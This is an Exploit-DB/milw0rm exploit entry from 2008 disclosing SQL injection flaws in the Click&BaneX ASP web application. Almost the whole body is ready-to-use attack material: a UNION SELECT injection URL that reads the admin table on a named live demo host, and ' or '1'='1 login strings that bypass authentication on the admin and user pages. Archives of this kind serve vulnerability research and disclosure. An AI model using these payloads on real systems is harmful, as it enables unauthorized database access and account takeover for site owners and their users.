Click&BaneX; Multiple Remote SQL Injection Vulnerabilities

2008-12-15T00:00:00
ID EDB-ID:7484
Type exploitdb
Reporter AlpHaNiX
Modified 2008-12-15T00:00:00

Description

Click&BaneX Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for asp platform

                                        
                                            ###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&BaneX
#download : null
#Demo     :  http://icash.ch/ClickAndBanexDemo/user/  %00 http://icash.ch/ClickAndBanexDemo/admin/

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00


##########################################################################

--=[AUTH BYPASS]=--

-----ADMIN PAGE----
http://icash.ch/ClickAndBanexDemo/admin/admin_menu.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


-----USER PAGE----
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp
USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]